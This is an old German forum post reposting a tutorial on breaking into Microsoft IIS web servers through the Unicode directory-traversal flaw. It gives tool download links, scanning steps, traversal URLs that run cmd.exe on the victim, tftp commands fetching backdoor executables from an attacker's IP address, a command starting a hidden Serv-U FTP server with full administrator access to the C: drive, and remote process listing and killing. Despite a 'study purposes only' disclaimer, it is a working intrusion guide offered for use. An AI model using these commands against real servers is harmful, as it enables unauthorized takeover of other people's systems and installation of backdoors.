How 2 Haxxor IIS

Dieses Thema im Forum "Security Tutorials" wurde erstellt von IronSnake, 29. Juli 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 29. Juli 2005
    kurz und knapp...es ist nicht von mir.
    Da ich mich atm für den ganzen kram interessiere stoße ich auf solch sachen die ich niemanden vorenthalten möchte^^

    Bleibe lieber bei phpmyadmin

    Naja hier das Tut



    Benötigte Tools:

    - SkHack.zip .....das gibt es hier http://e-gate.pl/~grzechu/SkHack.zip
    - Serv-U FTP Server (nur !!!!!) Version 3.0+ (http://www.serv-u.com/susetup.exe)
    - TFTPSuite Pro 2000 (http://www.walusoft.co.uk/software/tftppro.exe)
    - AccessDiver 4.5+ (http://accessdiver.com/download/ad4.6p.exe)
    - Liste mit Pubs J
    - Internet Explorer (Anmerkung: IE funzt auch mit Proxy)

    Wichtig: Nur zu Studienzwecken !!! Der Autor dieses Dokuments übernimmt keine Haftung für Deine Handlungen?


    Setup:

    - Schritt 1: Erstelle ein Verzeichnis namens ftp in c:\ und kopiere alle Dateien aus SkHack.zip hinein.
    - Schritt 2: Serv-U installieren
    - Schritt 3: TFTP Server installieren ? Nur ?Server? installieren
    - Schritt 4: AccessDiver installieren
    - Schritt 5: Kopiere die servudaemon.ini aus c:\ftp in Deine Serv-U Dir (vorhandenes File überschreiben)
    - Schritt 6: Serv-U Starten


    Serv-U einrichten:


    1. Doppelklick auf "Local Server". Dieser sollte sich nun öffnen und man sollte Domains sehen.
    2. Auf Domains klicken. Nun sollte man den Eintrag "FTP" sehen können
    und anklicken.
    3. Einen Port eingeben (der später für den gehackten Pub verwendet werden soll). Jetzt Rechtsklick auf "FTP" und dann "Apply"en.
    4. Wechseln zu ?Settings?. Hier ?Max no. Of Users? eingeben und die restlichen Einstellungen nach Belieben w?hlen. Danach Rechtsklick auf ?FTP? -> ?Apply?
    5. Wechseln zu ?Users?. Rechtsklick auf?s rechte Fenster -> ?New User? -> Username und Passwort eingeben. Als ?Home directory?. c:\ angeben.
    Wichtig: Die Option ?Lock User in Homedirectory? deaktivieren. Im rechten Fenster nun als Zugriffsrecht (Privillege) ?System Administrator? setzen
    6. Mit den Restlichen Einstellungen nach Belieben rumspielen fr?hlich
    7. ?Dir Access? anklicken und c: ausw?hlen. Alle Checkboxen f?r die Zugriffsrechte aktivieren.
    8. Rechtsklick auf den Usernamen -> ?Apply?
    9. Servudaemon.ini aus dem Serv-U Verzeichnis kopieren und die Datei in c:\ftp ?berschreiben.


    TFTSuitePro einrichten:



    So sollte das ungef?hr aussehen?

    -> System -> Setup

    Nun setzt man In- und Outbound File Path auf c:\ftp, best?tigen und fertig


    Und jetzt h4x0rn:

    Zuerst Accessdiver starten.

    - Men?leiste unter ?My Skill? die Option ?Exploiter Mode? w?hlen


    - Das Ordnersymbol links neben dem ?Start? Knopf anklicken und dort die iis.ini aus dem SkHack.zip laden.
    - Oben im gr?nen Eingabefeld die Pub IP in der Form http://xxx.xxx.xxx.xxx eingeben und den ?Start? Knopf dr?cken.
    - Nach dem Scan auf ?Status? gehen ? Wenn Dort eine Meldung mit einem (502) ist, dann ist der Pub hackable fr?hlich Wenn nicht ? den n?chsten Pub scannen.

    Im Falle eines (502) auf das Auge rechts daneben klicken. Nun ?ffnet sich ein Internet Explorer Fenster. Hier sollte nun ein Directory Listing des Servers erscheinen.
    Die Dir im IE sollte ungef?hr wie folgt aussehen:
    http://xxx.xxx.xxx.xx/scripts/..%%35%63.....exe?/c+dir+c:\

    Der gelb hervorgehobene Teil ist der so genannte Unicode. Der kann von Server zu Server unterschiedlich sein. Nun an die Aufschl?sselung des Unicodes:
    /scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\

    Der rote Teil (von Server zu Server verschieden) ist Teil 1 des Unicodes und der gr?ne ist der ?command? oder Teil 2 des Unicode
    (Anmerkung: Hier setzt man sp?ter Befehle an den Server ein). Einfach f?r sp?ter merken fr?hlich

    Jetzt versichert man sich, dass der TPFTPSuitePro Server l?uft (!!!!!).
    Der n?chste Schritt ist, die Serv-U Dateien hoch zu laden.
    Man nimmt den Unicode Teil 1, also den roten Part (den gr?nen, der mit winnt/system32 ? anf?ngt weg lassen !!!!!), l?fft das http://serverip/ vorne stehen und setzt hinten folgende Zeile hinten dran:

    winnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe+"-i"+217.225.238.124+get+ServUDaemon.exe+c:\temp\etc\ServUDaemon.exe
    winnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe+"-i"+217.225.238.124+get+ServUDaemon.ini+c:\temp\etc\ServUDaemon.ini
    winnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe+"-i"+217.225.238.124+get+TzoLibr.dll+c:\ TzoLibr.dll
    winnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe+"-i"+217.225.238.124+get+WINLOGIN.EXE+c:\WINLOGIN.EXE
    winnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe+"-i"+217.225.238.124+get+Servudaemon.ini+c:\Servudaemon.ini

    F?r das ?YourIPHere? die aktuelle eigene IP einsetzen (wer die nicht kennt sucht sich ein anderes Tut ).

    Mit den Beispieldaten von oben sieht das dann so aus:

    http://xxx.xxx.xxx.xx/scripts/..%%35%63....tem32\tftp.exe+"-i"+YourIPHere+get+WINMGNT.EXE+c:\WINMGNT.EXE

    Diesen Pfad in den IE kopieren und aufrufen. Wenn man nun den TPFTPSuitePro anschaut, m?sste man einen Upload der WINMGNT.EXE sehen.
    Sobald die hoch geladen ist, einfach den Dateinamen in der Zeile oben nacheinander durch folgende ersetzen:

    KILL.EXE
    TLIST.EXE
    WINLOGIN.EXE
    Servudaemon.ini

    Nachdem diese alle hoch geladen sind, folgende Zeile an den Unicode Teil 1 anh?ngen und im IE ausf?hren:

    http://xxx.xxx.xxx.xx/scripts/..%%35%63....INMGNT.EXE%20/h

    Nun sieht es so aus, als w?rde die Seite eine weile laden. Nach ungef?hr 10 Sekunden abbrechen.
    ? Der FTP sollte nun up sein?

    Mit den Zugangsdaten IP/Port/Login/PW die man vorher im Serv-U festgelegt hat ausprobieren ? wenn es geht, dann hat man nun volle Kontrolle ?ber das System fr?hlich


    Admin und FTP:


    Serv-U Admin ?ffnen, neuen FTP Server anlegen und die Daten vom gehackten Pub verwenden. Nun sollte selbiger unter ?Local Server? verf?gbar sein.
    Nun kann man an das Einrichten der Usergruppen etc. gehen. Wichtig ist, dass man immer Rechtsklick + Apply macht, sobald man ?nderungen vorgenommen hat.

    Zus?tzliche Funktionen:


    Tlist = Zeit alle laufenden Programme eines entfernten Rechner aufzulisten
    Kill = Beendet gew?hlte Prozesse

    Um Programme listen zu lassen, den Unicode Teil 1
    http://xxx.xxx.xxx.xx/scripts/..%%35%63..%%35%63

    und angeh?ngt die tlist.exe
    http://xxx.xxx.xxx.xx/scripts/..%%35%63..%%35%63tlist.exe
    im IE ausf?hren.
    Nun wird im Browser eine komplette Liste aller laufenden Prozesse angezeigt.
    Den ?Kill? Befehl f?hrt man folgender Ma?en aus:
    Kill.exe?Nummer

    Wenn man also das Programm Nr. 525 beenden m?chte:
    http://xxx.xxx.xxx.xx/scripts/..%%35%63..%%35%63kill.exe?525

    und es sollte die Meldung ?killed? kommen fr?hlich


    ****anstatt von accesdiver, kann man auch fx scanner nehmen, geht schneller
     
  2. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.